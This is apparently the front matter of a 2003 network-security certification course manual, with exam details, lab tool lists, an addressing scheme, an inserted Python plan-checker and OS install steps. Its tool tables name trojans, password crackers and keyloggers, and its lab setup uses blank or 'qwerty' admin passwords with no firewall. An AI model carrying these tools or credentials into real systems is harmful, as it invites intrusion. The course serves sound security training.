The SCNP (Security Certified Network Professional) is SCP’s Level One certificate, and it is primarily focused on defense. Level One deals with the protective security technologies in today’s enterprise environments—TCP Packet Analysis, Operating System Hardening, Router Security, Firewall Systems, Intrusion Detection Systems (IDSs), Virus Protection, VPNs, and Disaster Recovery.

The SCNP is a certification track that will test your ability to configure and maintain a secure networking environment.

What kind of experience do I need before I go for my SCNP?

Before you begin the SCNP certification track, it is recommended that, at a minimum, you attain CompTIA’s Security+ certification or have equivalent training with hands-on experience. The SCNP training and certification builds on concepts and skills covered in the Security+ certification.

How do I become SCNP-certified?

xx Hardening The Infrastructure (SCP)


The SCNP certification is comprised of two exams, Hardening the Infrastructure (HTI), and Network Defense and Countermeasures (NDC). To become SCNP-certified, candidates must pass both of these Level One exams.

It is also recommended that candidates study the official courseware before taking the exams.

What are the exams like?

The exams are multiple-answer, often scenario-based, tests. The HTI exam has 90 questions, and the candidate has 90 minutes to complete the exam.

At the time of this publication, the exam breakdown was as follows.

Examination Domain                            Percentage of Exam
1.0—Contingency Planning                      5
2.0—Tools and Techniques                      9
3.0—Security on the Internet and the WWW      11
4.0—Router Security and ACLs                  15
5.0—TCP/IP Packet Structure and Security      25
6.0—Operating System Security                 35
Total                                         100

Note that SCP exams are updated regularly to reflect changes in the network security industry. It is strongly recommended that potential candidates review the exam objectives at www.securitycertified.net/certifications.htm.

How do I take the exams?

The SCP exams are available at any Prometric or VUE Testing center, in over 7,400 locations around the world.

There are several ways to register for an exam. To register for SCP exams over the Internet, visit Prometric at www.2test.com or VUE at www.vue.com/it/, and create an account with the vendor of your choice (if you don’t already have one).

For International Exam Registration, please check with your preferred vendor’s Web site for more information.

During the exam:

• Read questions carefully. Don’t jump to any conclusions!

• Skip questions that you are unsure of, and come back to them at the end.

• If you have time remaining, you will be given the opportunity to review your answers. Be sure to do so, and make sure you didn’t make any obvious mistakes.

• If you come back to a question and are not sure about an answer, remember that your first hunch is more often correct than your second-choice answer (after overanalyzing the question)!

• Be sure to answer all questions; unanswered questions count against your score, so if you just don’t have an answer, try to eliminate any options that you know are wrong and make a best guess from whatever remains.


On your exam day, try to arrive 15 minutes early so you do not feel rushed or stressed by being late. This will also give you a few minutes to review any notes before beginning your exam. However, as the SCP exams are closed-book, notes or calculators may not be brought into the testing station and will have to be left with the facility’s faculty.

How much do the exams cost?

The current price for Level One exams is $150 each (USD).

Will my certification expire?

Yes. As technologies in the security field are constantly changing, your certificate will be valid for two years starting on the date you pass the second exam. SCNPs will need to retake only the NDC exam before their SCNP certification expires. Candidates who are recertifying will be able to do so at a discounted exam rate.

What if I want to go further?

After you have become SCNP-certified and want to further your knowledge, you can move on to the second level of the SCP track.

SCP’s Level Two deals with trust. Many enterprises are trying to integrate Digital Signatures, Digital Certificates, and Biometric and Smart Card authentication systems into their infrastructures. Trust, as it pertains to network security, is vital for businesses as they look to integrate their partners and suppliers into their business structures and provide real-time information and services to their customers.

Level Two is about the fundamentals of building a trusted network, strong authentication techniques, encryption, biometrics, smart cards, and network forensics. SCP Level Two includes two courses, PKI and Biometrics Concepts and Planning (PBC), and PKI and Biometrics Implementation (PBI). Each course is a 40-hour program, and the content and hands-on labs are structured to develop the skills required by today’s security experts.

To become a Security Certified Network Architect (SCNA), candidates must pass two exams. The first is Advanced Security Implementation (ASI), and the second is The Solution Exam (TSE), which will cover all facets of technologies covered in all of the SCP courses.

How do I prepare for the exam?

The HTI exam will require that you be familiar with the many technologies and utilities that are covered in this book. Further, the test was authored with the intention that people who have not become familiar with the technologies and utilities covered will not find it as easy to pass the exam as those who have used the programs and technologies in question.

What does this all mean? It means that you really should use the utilities and programs that are covered here, rather than just read about them. You should become very familiar with all of the tasks in this book. If possible, create a home lab with at least two machines, and practice—repeatedly—the hands-on tasks in this book. Even using what you learn to help secure your own home network from hosts on the Internet will help you prepare for the exam.

Studying for the exam:

1. Read the book from start to finish, completing all tasks even if you are familiar with the technology in question. You never know when some new facet of a technology or program may be brought up, and many of the lessons build upon the previous one. It is easy to miss something if you skip around.

2. Be sure to complete all hands-on tasks. Again, the SCP exams are based on knowledge and hands-on experience. Once you have completed a task, try doing it again.

3. Be sure to answer the Topic Review questions within each lesson. Make note of the questions you answered incorrectly, and study the appropriate sections again.

4. Before taking the SCP exams, it is recommended that you take the practice exams available through MeasureUp. More information on officially recommended practice exams is available at www.securitycertified.net/practice_tests.htm.

But perhaps the best way to make sure that you reach your goal is to register for the exam and stick to the date you set. Nothing keeps you on your toes and working toward a goal like a deadline! Honestly measure your skills, make your study schedule, set the date that you will be ready to take the exam, and register for it.

Practice exams

The only provider of practice exams authorized and recommended by the creators of the SCP is MeasureUp. Visit www.securitycertified.net/practice_tests.htm for more information.

Contact information

The Security Certified Program

U.S.: 800-869-0025

International: 630-472-5790

Email: [email protected]

Web site: www.SecurityCertified.Net

Course Prerequisites

To ensure your success, we recommend you first take the following New Horizons courses or have equivalent knowledge:

• Network+ Certification - Third Edition—2002 Objectives, A CompTIA Certification

• Security+ - A CompTIA Certification

Course Objectives

When you’re done working your way through this course, you’ll be able to:


• Investigate advanced concepts and procedures related to the TCP/IP protocol.

• Work with the secure version of IP, IPSec.

• Secure Linux computers and networks.

• Secure Windows 2000 computers and test the effectiveness of various security measures.

• Secure routers by using Access Control Lists and logging options.

• Investigate measures that can help ensure business continuity in the event of a disaster, such as contingency planning and power and backup issues.

• Define common Internet components, and identify techniques used in Web hacking and other attacks.

• Examine and work with common techniques used to attack networks and specific operating systems.

COURSE SETUP INFORMATION

Hardware and Software Requirements

To run this course, you will need:

• The hardware listed in the following table.

Hardware Type                     Quantity                          Minimum Specifications
Student machines                  1 per student                     — 500 MHz Pentium III processor (700 MHz or higher recommended).
                                                                    — 128 MB of RAM (256 MB or more recommended).
                                                                    — 8 GB hard disk.
                                                                    — Two non-integrated NICs (Intel or 3COM preferred—for promiscuous mode support).
                                                                    — Video card (Nvidia TNT2 preferred—from the point of view of driver availability for all OSs).
Instructor machines               1                                 Same as student machines.
Cisco routers                     3                                 2500 Series preferred; IOS 12.2 or greater, with IPSec/SSH support.
Cisco console cables              1
Serial cables                     2                                 DCE to DTE, for connecting routers together.
Switches or hubs                  2                                 10/100 Mbps.
Hardware keylogger                1
Null-modem and crossover cables   1 set for each pair of students   CAT 5.

Please read the Course Setup information thoroughly, and gather all of the hardware and software listed here before you proceed with this installation.


• For class preparation and use, the following software:

— A bootable DOS floppy disk with common utilities such as FDISK, FORMAT, MSCDEX, DELPART, and so forth, is sufficient for class purposes.

— The Windows 2000 Server operating system. The cost of an evaluation copy is $7.95, and you can obtain the software from the Microsoft Training Kits, TechNet, or http://microsoft.order-2.com/win2kast.

— The Red Hat 8.0 Linux operating system. It does not matter if you use the Personal or Professional Edition. The cost of this software is free, if you download it from www.redhat.com (or any of the various mirror sites listed there). It is recommended that you also download the installation guide. If you decide to download the OS from the Internet, download the ISO files and create CDs from the images. Choosing the Burn As Image option ensures that the CDs will be bootable.

— Hardware drivers for each OS and peripheral, especially NIC and video drivers. You should always keep these handy. In addition to having them on a CD, it is generally advisable to have a set of properly labeled floppy disks.

— Service Pack 2 for Windows 2000 Server. This Service Pack is free, and can be downloaded from http://download.microsoft.com/download/win2000platform/SP/SP2/NT5/EN-US/W2KSP2.exe (save the file to disk).

— The Internet Explorer 6 upgrade. This upgrade is free, and can be downloaded from www.microsoft.com/windows/ie/default.asp (you might need to be connected to the Internet to do the actual upgrade).

— The sysprep utility, from the Windows 2000 Resource Kit.

— Disk-cloning tools. Norton Ghost is recommended.

— SID-changing utilities. Norton Ghostwalk is recommended.

— For use in class, you will also need to acquire the tools and utilities described in the following tables. Tables are arranged by function, such as network scanning, firewalls, and so forth. Links are provided to enable you to download files from the Web, via an HTML version of these setup instructions on the course CD. Create a Tools share (or a CD) for use in class. Download and organize the tools in an appropriate folder structure, such as in folders named Linux Tools, Windows Tools, and Miscellaneous. The Miscellaneous folder can include utilities like MS Office file viewers, file unzippers, Adobe Acrobat Reader, and so forth. The capture and signature files required for some of the tasks in the course, as well as all the RFCs, are included with each course manual.

Network Scanning Tools

Tool                 OS/Cost                 Used in Tasks   Download From
SuperScan            Windows/Eval is free    Yes             www.foundstone.com/knowledge/scanning.html
Nmap                 Linux/Built-in          Yes             Included in Red Hat 8.0
NmapFE               Linux/Built-in          Yes             Included in Red Hat 8.0
NmapNT               Windows/Free            No              www.eeye.com/html/Research/Tools/nmapnt/nmapNTsp1.zip
Pinger               Windows/Free            No              http://visualsoftru.com/ping/pinger.exe
Strobe               Linux, Windows/Free     No              For Linux, www.luyer.net/software/strobe-classb/
Nessus               Linux/Free              Yes             ftp://ftp.nessus.org/pub/nessus/nessus-2.0.3/nessus-installer/nessus-installer.sh
udpflood.exe         Windows/Free            Yes             www.foundstone.com/knowledge/stress_testing.html
NetScan Tools Pro    Windows/Eval is free    No              ftp://ftp.netscantools.com/pub/nst430a.zip
Netcat               Linux, Windows/Free     Yes             For Linux, included with Red Hat 8.0. For Windows, www.atstake.com/research/tools/nc11nt.zip

It is assumed that each education center has a TechNet or MSDN subscription and the Windows 2000 Resource Kit.

Be aware that these tables contain tools and utilities that are not specifically used in the hands-on activities in this course.

All links listed in this document were last tested for availability on February 14, 2003.

Network Sniffer and Routing Tools

Tool                 OS/Cost                 Used in Tasks   Download From
Network Monitor      Windows/Built-in        Yes             Included in Windows 2000 Server
Ethereal 0.9.11      Windows, Linux/Free     Yes             For Linux, included with Red Hat 8.0. For Windows, www.ethereal.com/distribution/Win32
Tcpdump              Linux/Free              No              www.tcpdump.org/
Windump              Windows/Free            No              http://windump.polito.it/install/default.htm
WinPcap 2.3          Windows/Free            Yes             http://windump.polito.it/install/default.htm
Visual Route         Windows/Eval is free    Yes             ftp://ftp.visualware.com/pub/vr/vr.exe
NeoTrace             Windows/Eval is free    No              www.tucows.com/preview/194046.html

Password Tools

Tool                   OS/Cost                     Used in Tasks              Download From
L0pht Crack 2.5        Windows/Eval is free        No                         www.32bit.bhs.com/downloads/file.asp?id=4519
L0pht Crack LC4        Windows/Eval is free        Yes                        www.atstake.com/research/lc/application/lc4setup.exe
Crack 5.0              Linux/Free                  No                         ftp://ftp.openbsd.org/pub/OpenBSD/2.7/packages/i386/crack-5.0.tgz
John the Ripper        Windows, Linux, DOS/Free    Yes (Linux version only)   For Linux, www.openwall.com/john/john-1.6.tar.gz. For Windows, www.openwall.com/john/john-1.6w.zip
Snadboy’s Revelation   Windows/Free                Yes                        www.snadboy.com/RevelationV2.zip


Trojan Horses and Exploit Tools

Tool                 OS/Cost                 Used in Tasks   Download From
Netbus               Windows/Free            No              http://nttoolbox.com/public/tools/NetBus170.zip
NetBus Pro           Windows/Free            Yes             http://home.t-online.de/home/TschiTschi/netbus_pro_eng.htm
SubSeven             Windows/Free            No              www.subseven.ws/
GetAdmin             Windows NT/Free         No              http://packetstormsecurity.org

Forensics and Keyboard Logging Tools

Tool                 OS/Cost                                                   Used in Tasks   Download or Order From
NTFSDOS              Linux/Free, DOS/Eval is free                              Yes             For DOS, www.sysinternals.com/files/ntfs30r.zip (The Read-only version will do.) For Linux, linux-ntfs.sourceforge.net/info/redhat.html#how
Keylogger            Any (This is hardware.)/$89 to $199 (one per class only)  Yes             www.keyghost.com
Security keyboard    Any (This is hardware.)/$129 to $299 (one per class only) Yes             www.keyghost.com
Keystroke logger     Any (This is hardware.)/$54.95 (one per class only)       Yes             www.electronickits.com/spy/finish/computer/key.htm
Klogger              Windows/Free                                              Yes             http://ntsecurity.nu/cgi-bin/download/klogger.exe.pl

Intrusion Detection Tools

Tool                     OS/Cost                 Used in Tasks   Download From
ISS Internet Scanner 6   Windows/Free            No              Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/download/
ISS System Scanner 6     Windows/Free            No              Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/download/
Snort                    Linux, Windows/Free     No              www.snort.org/dl/binaries
IDSCenter                Windows/Free            No              www.snort.org/dl/contrib/front_ends


Firewalls

Tool                 OS/Cost                                                          Used in Tasks   Download From
CheckPoint NG        Windows 2000 Server with SP2/$2000 approx. (one per class only)  No              www.checkpoint.com. Part number is CPFW-FM-25-NG.
ISA Server 2000      Windows 2000 with SP1 min./Eval is free                          No              www.microsoft.com/isaserver/evaluation/trial/default.asp

Network and Security Administration Tools

Tool                            OS/Cost                                 Used in Tasks   Download From
IPv6 Technology Preview         Windows/Free                            Yes             http://msdn.microsoft.com/downloads/sdks/platform/tpipv6/download.asp
Webmin                          Any (browser-based management.)/Free    Yes             www.webmin.com. Download either the rpm or the tarball.
Tripwire                        Linux/Built-in                          Yes             Included with Red Hat 8.0
Bastille                        Linux/Free                              Yes             http://osdn.dl.sourceforge.net/sourceforge/bastille-linux/Bastille-2.0.4-1.0.i386.rpm
pwlib-1.3.3-5.i386.rpm          Linux/Free                              Yes             www.bastille-linux.org/pwlib-1.3.3-5.i386.rpm
perl-Tk-800.023-9mdk.i586.rpm   Linux/Free                              Yes             www.bastille-linux.org/perl-Tk-800.023-9mdk.i586.rpm
Windows 2000 Gold Standard      Windows/Free                            Yes             www.cisecurity.org
PuTTY.exe                       Windows/Free                            Yes             http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
HiSecWeb security template      Windows/Free                            Yes             http://download.microsoft.com/download/win2000srv/SCM/1.0/NT5/EN-US/hisecweb.exe
IIS Lockdown tool               Windows/Free                            Yes             http://download.microsoft.com/download/iis50/Utility/2.1/NT45XP/EN-US/iislockd.exe
HFNetChk tool                   Windows/Free                            Yes             http://download.microsoft.com/download/win2000platform/Utility/3.3/NT45/EN-US/Nshc332.exe (For the original command-line tool, go to hfnetchk.shavlik.com/hfnetchk_3.86.0.1.exe. Or, for the new Microsoft Baseline Security Analyzer, go to download.microsoft.com/download/e/5/7/e57f498f-2468-4905-aa5f-369252f8b15c/mbsasetup.msi.)

Miscellaneous Tools

Tool                 OS/Cost                 Used in Tasks   Download From
File Unzippers       Windows, DOS/Free       Yes             www.winzip.com, www.pkware.com, or www.rarlab.com
PDF Viewer           Windows/Free            No              www.adobe.com/products/acrobat/readstep2.html
MS Office Viewers    Windows/Free            No              http://office.microsoft.com/downloads/default.aspx

• For use in class, students will need the following:

— A bootable DOS floppy disk, similar to the one used for class preparation.

— Tools and utilities as described previously. These tools need to be downloaded from the Web and can be burned onto a CD-ROM, placed in a shared folder on the classroom network, or copied onto the student machines.

Note: If you decide to create a Tools CD-ROM for use in class, make sure that the instructor collects the CD-ROMs from the students at the end of the course.

— The CD-ROM included with the course manual.

• For use in class, the instructor will need the following:

— A bootable DOS floppy disk, similar to the one used for class preparation.

— Tools and utilities as described previously. These tools need to be downloaded from the Web, and can be burned onto a CD-ROM or copied onto the instructor’s machine.

— The CD-ROM included with the course manual.

— A hardware keylogger.

Note: During class, the instructor does not need to have, but should have access to, the disks used for class preparation.

Class Requirements

In order for the class to run properly, perform the procedures described below.


Before you begin actually setting up the class, here are some recommendations for classroom configuration and hardware preparation.

Recommendations for Hardware Preparation

• The minimum hardware requirements are listed earlier in this course. It is not advisable to use anything less.

• It is recommended that all the computers be of the same or similar hardware configuration.

• If you do use computers with integrated motherboards and the video uses shared memory, we recommend you decrease the amount of shared memory to 2 MB so that you have as much RAM available for the OS as possible.

• Configure the BIOS so that the boot order is 1: CD-ROM, 2: Floppy Drive, and 3: Hard Drive. Protect the student machine BIOSs with a password.

Classroom Configuration

Figure 0-1 shows the recommended classroom configuration. Use this figure in conjunction with the IP addressing and naming schemes described in the following section.

Figure 0-1: The recommended classroom configuration includes 12 student computers and 1 instructor computer.

IP Addressing and Computer Naming Scheme

Refer to the class layout diagram shown in Figure 0-1. The chart in Figure 0-2 shows the recommended IP addressing and computer-naming scheme. Use this pattern to develop addresses and names for additional machines as needed.

Estimated minimum time for classroom setup (12 student machines and one instructor machine): 5 hours.


The routers divide the classroom into two halves—LEFT and RIGHT—with the CENTER router controlled by the instructor. The LEFT side is configured for subnet 172.16.0.0, the CENTER is on subnet 172.17.0.0 and the RIGHT side is on subnet 172.18.0.0. Students should be given the passwords for the LEFT and RIGHT routers but not for the CENTER router. In the chart, NIC 1 refers to the network card that is connected to the classroom hub, and NIC 2 refers to the network card that is connected to the partner machine (via a crossover cable).

Part of Classroom   Windows 2000 Name   Linux Name   NIC 1 (IP Address; Default Gateway)   NIC 2 (IP Address)
LEFT                STU-W2K-L01         stulnxl01    IP: 172.16.10.1; DG: 172.16.0.1       IP: 172.26.10.1
                    STU-W2K-L02         stulnxl02    IP: 172.16.10.2; DG: 172.16.0.1       IP: 172.26.10.2
                    STU-W2K-L03         stulnxl03    IP: 172.16.10.3; DG: 172.16.0.1       IP: 172.26.10.3
RIGHT               STU-W2K-R01         stulnxr01    IP: 172.18.10.1; DG: 172.18.0.1       IP: 172.28.10.1
                    STU-W2K-R02         stulnxr02    IP: 172.18.10.2; DG: 172.18.0.1       IP: 172.28.10.2
                    STU-W2K-R03         stulnxr03    IP: 172.18.10.3; DG: 172.18.0.1       IP: 172.28.10.3
CENTER              INS-W2K-C01         inslnxc01    IP: 172.17.10.1; DG: 172.17.0.1       N/A

Figure 0-2: Classroom configuration scheme.
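The chart above gives three machines per side; the instructor is told to extend the pattern to the 12 student computers of Figure 0-1. The following script is an added example, not part of the course materials: it generates names and addresses from the Figure 0-2 pattern for any class size and checks the result for the mistakes that break a classroom network (gateway outside the host's subnet, duplicate addresses, crossover link landing on a routed subnet). It assumes a /16 mask on every classroom subnet, which the chart does not state.

```python
"""Generate and sanity-check the classroom IP addressing and naming scheme.

Added example, not the course's own tooling. Assumptions not stated in the
chart: each classroom subnet uses a /16 mask, hosts sit in the .10.x range of
their side's subnet, and NIC 2 mirrors the NIC 1 host number on the parallel
172.26 / 172.28 networks.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Per-side parameters read off the Figure 0-2 chart.
SIDES = {
    "LEFT":   {"code": "l", "role": "STU", "nic1_net": "172.16.0.0/16", "nic2_net": "172.26.0.0/16"},
    "CENTER": {"code": "c", "role": "INS", "nic1_net": "172.17.0.0/16", "nic2_net": None},
    "RIGHT":  {"code": "r", "role": "STU", "nic1_net": "172.18.0.0/16", "nic2_net": "172.28.0.0/16"},
}
HOST_OCTET3 = 10  # classroom hosts live at 172.x.10.N


@dataclass(frozen=True)
class Host:
    side: str
    w2k_name: str
    linux_name: str
    nic1_ip: str
    gateway: str
    nic2_ip: Optional[str]


def make_host(side: str, index: int) -> Host:
    """Build the names and addresses for machine number `index` on `side`."""
    p = SIDES[side]
    net1 = ipaddress.ip_network(p["nic1_net"])
    nic1 = str(net1.network_address + HOST_OCTET3 * 256 + index)
    gateway = str(net1.network_address + 1)  # the side's router sits at x.x.0.1
    nic2 = None
    if p["nic2_net"] is not None:
        net2 = ipaddress.ip_network(p["nic2_net"])
        nic2 = str(net2.network_address + HOST_OCTET3 * 256 + index)
    w2k = f"{p['role']}-W2K-{p['code'].upper()}{index:02d}"  # e.g. STU-W2K-L01
    linux = f"{p['role'].lower()}lnx{p['code']}{index:02d}"   # e.g. stulnxl01
    return Host(side, w2k, linux, nic1, gateway, nic2)


def build_plan(students_per_side: int) -> List[Host]:
    """One instructor machine plus `students_per_side` machines on each side."""
    plan = [make_host("CENTER", 1)]
    for side in ("LEFT", "RIGHT"):
        plan.extend(make_host(side, i) for i in range(1, students_per_side + 1))
    return plan


def check_plan(plan: List[Host]) -> List[str]:
    """Return a list of inconsistencies; an empty list means the plan is sound."""
    problems = []
    owner = {}
    routed = [ipaddress.ip_network(s["nic1_net"]) for s in SIDES.values()]
    for h in plan:
        net = ipaddress.ip_network(SIDES[h.side]["nic1_net"])
        # NIC 1 and its default gateway must share the side's subnet, or the
        # host has no route to its router.
        if not (ipaddress.ip_address(h.nic1_ip) in net
                and ipaddress.ip_address(h.gateway) in net):
            problems.append(f"{h.w2k_name}: NIC 1 {h.nic1_ip} / DG {h.gateway} not both in {net}")
        # No address may be handed out twice across NIC 1 and NIC 2.
        for ip in (h.nic1_ip, h.nic2_ip):
            if ip is not None:
                if ip in owner:
                    problems.append(f"{ip} assigned to both {owner[ip]} and {h.w2k_name}")
                owner[ip] = h.w2k_name
        # The crossover link must stay off the routed classroom subnets.
        if h.nic2_ip is not None and any(ipaddress.ip_address(h.nic2_ip) in r for r in routed):
            problems.append(f"{h.w2k_name}: NIC 2 {h.nic2_ip} overlaps a routed subnet")
    return problems


if __name__ == "__main__":
    for host in build_plan(3):
        print(f"{host.side:6} {host.w2k_name:12} {host.linux_name:10} "
              f"NIC 1 {host.nic1_ip} DG {host.gateway} NIC 2 {host.nic2_ip or 'N/A'}")
    print("problems:", check_plan(build_plan(6)))
```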

IMPORTANT: Overview of the Partitioning Scheme for an 8 GB Hard Drive

Because you will be installing more than one OS on each machine, it’s important to set up the proper disk partition sizes. Fortunately, because of the OSs involved, you can do most of this partitioning as part of the installation routines for each OS. See Figure 0-3 for a graphic rendition of the hard drive.

Figure 0-3: A visual representation of the hard drive partitioning required for this course.

Estimated minimum time for partitioning and installing OSs on one machine: 3 hours.


Another method to create a multi-boot machine is to install a host operating system such as Windows 2000 Professional, configure all the drivers, load VMware on top of the host OS, then install Windows 2000 Server and Red Hat Linux 8.0 as guest operating systems on top of the host OS. Note that this will require substantial hardware resources.

Installing and Configuring Windows 2000 Server

1. Boot to DOS using a bootable DOS floppy disk (with utilities like delpart.exe, fdisk.exe, format.exe, mscdex.exe, and so forth).

2. Run delpart and fdisk /mbr to clean out the hard drive’s partitions and Master Boot Record.

3. Insert the installation CD-ROM for Windows 2000 Server, and boot to it. The Windows 2000 Server Setup screen is displayed.

4. Press Enter to specify that you want to perform a new install. The Windows 2000 License Agreement is displayed.

5. Read the License Agreement, and then press F8 to accept the agreement.

6. When you are prompted for the location to use for setting up Windows, create a new partition of 2600 MB and specify this partition as the location for Windows 2000.

7. When you are prompted, specify that you do want the drive to be NTFS and press Enter. After the partition has been formatted and files copied, the computer will reboot.

8. At the Welcome To The Windows 2000 Server Setup Wizard screen, click Next. Setup next detects and installs device drivers.

9. For Regional Settings, select your local settings, and then click Next.

10. At the Personalize Your Software screen, use student for the Name, and SCP for the Organization. Click Next.

11. If prompted, enter the product key and click Next.

12. In the Licensing Modes screen, select Per Seat and click Next. If you choose Per Server, change the value to 99.

13. In the Computer Name and Administrator Password dialog box, leave the username as Administrator, and specify the Computer Name as XXX-W2K-XXX. You will change the computer name on the cloned hard drives after the drives have been cloned. The student computers must use a blank password. (The Instructor machine can have a password, but the student computers cannot). Once the password has been defined or left blank, as appropriate, click Next.

14. If a modem is detected (some integrated motherboards have onboard modems, for example), enter the applicable area code and settings, and then click Next.

Estimated minimum time for Windows 2000 Server installation and configuration: 1 hour, 30 minutes.


15. In the Windows 2000 Components screen, select IIS, click Details, check FTP, and click OK. Select Management And Monitoring Tools, click Details, check Network Monitor Tools, and click OK.

16. Click Next.

17. In the Date And Time Settings dialog box, enter the local settings and click Next.

18. For Network Settings, select Typical Settings and click Next.

19. If prompted, configure the TCP/IP settings to use DHCP for now. You will configure these settings on the cloned hard drives later.

20. Specify that the computer is to be part of a Workgroup called Workgroup.

21. Click Next to enable the computer to perform the final installation tasks. This will take several minutes.

22. When the Completing The Windows 2000 Setup Wizard is displayed, click Finish to complete the installation.

23. When the computer restarts, remove the installation CD-ROM, and log on to Windows 2000 as Administrator.

24. In the Configure Your Server dialog box, select I Will Configure This Server Later, and click Next. Uncheck Show This Screen At Startup, and then close the Windows 2000 Configure Your Server window.

25. Insert the Windows 2000 Server CD-ROM, and copy the i386 folder from the CD-ROM to the partition where you installed Windows 2000. Then, remove the CD-ROM.

26. Copy the file w2ksp2.exe to the partition where you installed Windows 2000, and double-click it to install Service Pack 2.

27. Accept all defaults for the Service Pack installation, and reboot when you are prompted to do so.

28. After the reboot, log on as Administrator, copy the file ie6setup.exe to the Windows 2000 boot partition, and run the program to upgrade to IE 6.

29. If the machines you plan to use in class have the same general hardware configuration, install any necessary drivers so that they will be copied to the cloned hard drives.

30. Open the Display Properties, select the Settings tab, and change the screen resolution to be at least 800 by 600 pixels.

31. Start Windows Explorer, select the C drive (or the drive letter that corresponds to the Windows 2000 boot partition), and choose View→Details.

Choose View→Choose Columns, check Attributes, and click OK.


Choose Tools→Folder Options. Under Web View, select Use Windows Classic Folders, and click Apply.

In the Folder Options dialog box, select the View tab, check the first three check boxes, select Show Hidden Files And Folders, uncheck the next six check boxes, and click Apply. Then, click the Like Current Folder button, click Yes to close the Folder Views information box, and click OK to close the Folder Options dialog box.

32. Close Explorer.

33. Use the Start→Programs→Accessories menu to open a command prompt, right-click its title bar, and choose Properties. Select the Layout tab, uncheck Let System Position Window, and change the settings as shown in the following table.

Setting              Width   Height
Screen Buffer Size   90      4000
Window Size          90      42
Window Position      48      0

Click OK, select Modify Shortcut That Started This Window, and click OK. Close the command prompt.

34. Use the Run dialog box to open a command prompt. Modify this command prompt’s Layout properties similarly to the previous step. Click OK, select Save Properties For Future Windows With Same Title, and click OK. Then close the command prompt.

35. Right-click the Taskbar and choose Properties. Uncheck Use Personalized Menus and click OK.

36. If you are not supplying the Windows 2000 tools on a CD-ROM or shared folder, copy the Windows 2000 tools to the Windows 2000 boot partition.

37. Run the Sysprep utility. Do not boot to Windows 2000 again until after you have cloned or multicast the hard drives.

Installing and Configuring Red Hat 8.0 Linux

You can find a complete installation manual at www.redhat.com/docs/manuals/linux/RHL-8.0-Manual/install-guide.

1. Insert the Red Hat Linux 8.0 Disc 1 into your CD-ROM drive and boot to it. An installation routine screen with several options is displayed.

2. Press Enter to perform the install in GUI mode.

3. If necessary, use the Tab key to select Skip, and press Enter to skip the test on the CD media.

4. While the anaconda installer runs for a few minutes, please wait at this point.

5. When you are presented with the Welcome GUI, click Next.

Estimated minimum time for Red Hat 8.0 Linux installation and configuration: 1 hour, 30 minutes.


6. Accept the default Language selection settings, and click Next.

7. Accept the default Keyboard selection settings, and click Next.

8. Verify that the default Mouse selection settings are accurate, and click Next.

9. For the Installation Type, select Custom. Do not select Server—it will wipe out and take over your hard drive. Click Next.

10. Select Manually Partition With Fdisk and click Next. You can use Disk Druid if you prefer, but these instructions list only the steps for using fdisk.

11. Click the button for your hard drive. If you have only one IDE hard drive that’s set to Master, you will see the button labeled as hda. Watch out with this option—make sure you’re creating the install on a machine that is representative of your classroom.

12. Verify that the next screen has an explanation of the fdisk options for Linux in the left pane. The commands can be entered in the right pane.

13. Enter p to see the partition table. Primary partitions are numbered 1 through 4. One of these Primary partitions can be created as an Extended partition. Logical drives within the Extended partition are numbered from 5 onward.

14. Create an extended partition to hold the Linux logical partitions. To do this:

a. Enter n to create a new partition.

b. Enter e to specify that you want to create an Extended partition.

c. Enter 2 to specify the Partition Number.

d. For the first cylinder, press Enter.

e. Enter 1023 to specify the last cylinder.

f. Enter p to display the partition table again.

15. Create a logical drive of 100 MB for the /boot partition. To do this:

a. Enter n to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; this should be 5.

d. For the first cylinder, press Enter.

e. For the last cylinder enter +100M to create a logical drive of 100 MB.

16. Create a swap space of 256 MB. To do this:

a. Enter n to specify that you want to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; this should be 6.

d. For the first cylinder, press Enter.

e. For the last cylinder enter +256M to create a logical drive of 256 MB.


17. Create a logical drive for the rest of the space (approximately 5+ GB). To do this:

a. Enter n to specify that you want to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; this should be 7.

d. For the first cylinder, press Enter.

e. For the last cylinder, press Enter again to allocate all remaining space in the extended partition for this logical drive.

18. Enter p to see the updated partition table. Verify that the three logical drives—named hda5, hda6, and hda7—are displayed, and that the partition type (in Hex code) is Type 83 for the three logical drives you just created.

19. Make the 256 MB partition (logical drive 6) a swap partition. To do this:

a. Enter t to specify that you want to change a partition’s type.

b. For the partition number, specify the number for this partition (it should be 6).

c. For Hex code, enter 82 to assign this partition to be the swap space.

20. Verify that you have the right partition types by viewing the partition table before you write to it (enter p to view). tmp/hda6 should be listed as Linux Swap.

21. Enter w to commit to this partition table. When you are returned to the Partitioning With Fdisk screen, click Next.

22. If you see a popup informing you that a partition type 82h has to be formatted as a Linux swap partition, and asking if you would like to do so, click Yes.

23. Double-click the 100 MB partition, and assign it to the /boot mount point. To do this:

a. Select the Format Partition As ext3 radio button.

b. Click the drop-down button for Mount Point.

c. Select /boot and click OK.

24. Double-click the 5+ GB partition, and assign it to the / mount point. To do this:

a. Select the Format Partition As ext3 radio button.

b. Click the drop-down button for Mount Point.

c. Select / and click OK.

25. Click Next. If you see a popup titled Format Warnings, click Format.

26. In the Boot Loader configuration screen, accept the default boot loader GRUB.


27. Change the label for the dos partition and make it the default boot drive, by selecting it and clicking Edit, changing the label to read Windows 2000, checking Default Boot Target, and clicking OK. (This is what you will see later in the startup screen.) Click Next.

28. Specify that you do not wish to activate the network interface(s) at boot. When you image this hard drive and boot to Linux, each machine will take a long time to discover that there are no DHCP servers around.

29. Manually set the hostname to xxxlnxxxx (no hyphens or spaces).

30. Leave the miscellaneous settings alone for now, and click Next. You can configure these settings after imaging the hard drives. Click Continue to clear any warning messages you might receive.

31. For Security Level, select No Firewall, and click Next.

32. Accept the default language selection, and click Next.

33. Select the appropriate Time Zone and Daylight Savings Time, where applicable. Click Next.

34. Specify the password for the built-in Root account to be qwerty and click Next. You do not have to create any more accounts at this stage.

35. Accept the defaults for Authentication Configuration, and click Next.

36. When selecting Package Groups, scroll down and select Everything, and then click Next to do a complete install of all packages.

37. At the About To Install screen, click Next, and wait for the install to go through its steps. Depending upon the CPU, this could take anywhere from 45 to 90 minutes. Change disks when prompted (you will need to use all three disks).

